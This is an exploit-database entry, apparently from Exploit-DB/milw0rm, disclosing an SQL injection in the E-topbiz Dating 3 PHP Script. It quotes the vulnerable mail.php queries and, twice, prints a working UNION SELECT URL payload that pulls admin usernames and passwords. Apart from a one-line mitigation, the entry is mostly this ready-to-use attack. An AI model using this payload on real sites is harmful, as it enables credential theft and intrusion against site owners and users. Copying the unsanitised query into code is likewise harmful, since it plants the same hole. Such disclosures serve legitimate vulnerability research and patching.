Dating 3 PHP Script SQL-INJECTION

vendor:

Dating 3 PHP Script

by:

Corwin

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Dating 3 PHP Script

Affected Version From: 1

Affected Version To: 3

Patch Exists: NO

Related CWE: N/A

CPE: a:e-topbiz:dating_3_php_script

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Dating 3 PHP Script SQL-INJECTION

Must be authenticated as a regular user. http://host/members/mail.php?action=veiw&mail_id=-1 union select 1,2,3,concat(username,0x3a,password),5,6,7 from admin/*

Mitigation:

Input validation and sanitization should be done to prevent SQL injection attacks.

Source

Exploit-DB raw data:

================================================================================
|| Dating 3 PHP Script SQL-INJECTION
================================================================================

Application: E-topbiz Dating 3 PHP Script
------------

Version: 1.0
--------

Website: http://e-topbiz.com/oprema/pages/dating3.php
--------

Demo: http://e-topbiz.com/trafficdemos/dating3
-----

Version: 3.0
--------

About: Dating 3 is a very powerful top quality dating php script for webmasters who wish to run an online dating site.
------

Date: 01-08-2008
-----

[ VULNERABLE CODE ]

members/mail.php

@Line:

  142:     if($action==inbox) { 
  143:     $result=mysql_query("select * from mail where UserTo ='$username' ORDER BY SentDate DESC") or die ("cant do it"); 


  150:     if($action==veiw) { 
  151:     $result=mysql_query("select * from mail where UserTo='$username' and mail_id=$mail_id") or die ("cant do it"); 



===>>> Exploit:

Must be authenticated as a regular user.

http://host/members/mail.php?action=veiw&mail_id=-1 union select 1,2,3,concat(username,0x3a,password),5,6,7 from admin/*



Author: Corwin
-------                                     
	
Contact: corwin88[dog]mail[dot]ru
--------

# milw0rm.com [2008-08-01]